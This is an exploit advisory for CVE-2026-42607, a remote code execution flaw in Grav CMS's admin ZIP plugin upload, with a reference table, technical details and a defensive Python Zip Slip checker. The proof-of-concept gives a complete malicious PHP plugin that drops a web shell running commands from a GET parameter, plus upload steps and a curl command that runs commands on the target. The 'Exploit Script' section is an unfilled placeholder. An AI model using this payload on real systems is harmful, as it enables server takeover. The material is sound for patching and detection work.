| Title | Published | Reporter |
|---|---|---|
| CVE-2026-42607 | 27 Apr 2026 12:14 | circl |
| Grav Code Injection Vulnerability | 11 May 2026 00:00 | cnnvd |
| CVE-2026-42607 | 11 May 2026 14:58 | cve |
| CVE-2026-42607 Grav: Remote Code Execution (RCE) via Malicious Plugin ZIP Upload in Direct Install Feature | 11 May 2026 14:58 | cvelist |
| Grav CMS 2.0.0-beta.2 - Remote Code Execution | 26 May 2026 00:00 | exploitdb |
| Grav Vulnerable to Remote Code Execution (RCE) via Malicious Plugin ZIP Upload in Direct Install Feature | 5 May 2026 21:21 | github |
| CVE-2026-42607 | 11 May 2026 16:17 | nvd |
| GHSA-W48R-JPPP-RCFW Grav Vulnerable to Remote Code Execution (RCE) via Malicious Plugin ZIP Upload in Direct Install Feature | 5 May 2026 21:21 | osv |
| Grav CMS Remote Code Execution | 17 Jun 2026 00:00 | packetstorm |
| Grav CMS Zip Slip Remote Code Execution | 18 Jun 2026 00:00 | packetstorm |
# Exploit Title: Grav CMS < 2.0.0-beta.2 - Remote Code Execution (RCE)
# Date: 2026-05-08
# Exploit Author: Mustafa Murat Akgül
# Vendor Homepage: https://getgrav.org/
# Software Link: https://github.com/getgrav/grav
# Version: < 2.0.0-beta.2
# CVE: CVE-2026-42607 / GHSA-w48r-jppp-rcfw
# Tested on: Linux/Ubuntu (Grav Admin Plugin Enabled)
Technical Details:
The Grav CMS "Direct Install" feature in the Admin plugin allows administrators
to upload plugins as ZIP files. The system did not adequately validate the
contents of the ZIP archive, nor did it prevent path traversal (Zip Slip) during
extraction. By crafting a malicious plugin that hooks into Grav events (e.g.,
onPluginsInitialized), an attacker can execute arbitrary PHP code or drop a
persistent web shell in the Grav root directory.
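As an added defensive example (not part of the original advisory or Grav's own code), the following Python check shows what an installer should do with an uploaded plugin archive before writing a single entry: resolve every archive path against the plugin directory and reject anything that escapes it, is absolute, or is a symlink. The sample archive and the destination path /var/www/grav/user/plugins are constructed for illustration.

```python
import io
import os
import stat
import zipfile


def zip_slip_entries(zip_bytes: bytes, dest_dir: str) -> list[str]:
    """Return the archive entries that must not be extracted under dest_dir.

    Every entry name is normalised and resolved against the target directory;
    anything that would land outside it (absolute paths, drive letters, '..'
    escapes) or that is a symlink entry is reported. An empty list means the
    archive is safe to extract into dest_dir.
    """
    dest = os.path.abspath(dest_dir)
    rejected = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename.replace("\\", "/")
            # Symlink entries can redirect later writes outside dest_dir.
            if stat.S_ISLNK(info.external_attr >> 16):
                rejected.append(info.filename)
                continue
            # Absolute paths and Windows drive letters are never acceptable.
            if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
                rejected.append(info.filename)
                continue
            # Lexically resolve the entry and require it to stay under dest.
            target = os.path.abspath(os.path.join(dest, name))
            if os.path.commonpath([dest, target]) != dest:
                rejected.append(info.filename)
    return rejected


def build_sample_zip() -> bytes:
    """Constructed sample archive: one legitimate plugin file, three bad entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("shellplugin/shellplugin.php", "<?php // ordinary plugin file\n")
        zf.writestr("../../shell.php", "<?php // would escape two levels up\n")
        zf.writestr("/etc/cron.d/job", "placeholder\n")
        link = zipfile.ZipInfo("shellplugin/evil-link")
        link.external_attr = 0o120777 << 16  # mark the entry as a symlink
        zf.writestr(link, "../../index.php")  # symlink target is stored as content
    return buf.getvalue()


if __name__ == "__main__":
    for entry in zip_slip_entries(build_sample_zip(), "/var/www/grav/user/plugins"):
        print("rejected:", entry)
```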
Proof of Concept (PoC):
1. Create a malicious plugin structure:
- shellplugin/blueprints.yaml
- shellplugin/shellplugin.yaml
- shellplugin/shellplugin.php (Payload below)
--- shellplugin.php ---
<?php
namespace Grav\Plugin;

use Grav\Common\Plugin;

class ShellpluginPlugin extends Plugin {
    public static function getSubscribedEvents(): array {
        return ['onPluginsInitialized' => ['onPluginsInitialized', 0]];
    }

    public function onPluginsInitialized(): void {
        $shell_path = GRAV_ROOT . '/shell.php';
        if (!file_exists($shell_path)) {
            file_put_contents($shell_path, '<?php system($_GET["cmd"]); ?>');
        }
    }
}
----------------------
2. Compress the directory:
$ zip -r shellplugin.zip shellplugin/
3. Log in to the Grav Admin panel and navigate to:
/admin/tools/direct-install
4. Upload the 'shellplugin.zip' file.
5. Once installed, the plugin triggers on the next request to the site,
dropping a shell at the root.
6. Access your shell:
curl "http://<target>/shell.php?cmd=id"
Exploit Script (Python):
[You can add the Python script you shared above here]
Impact:
Full system-level access under the context of the web server user. An attacker
with administrative privileges (or via CSRF) can compromise the entire server.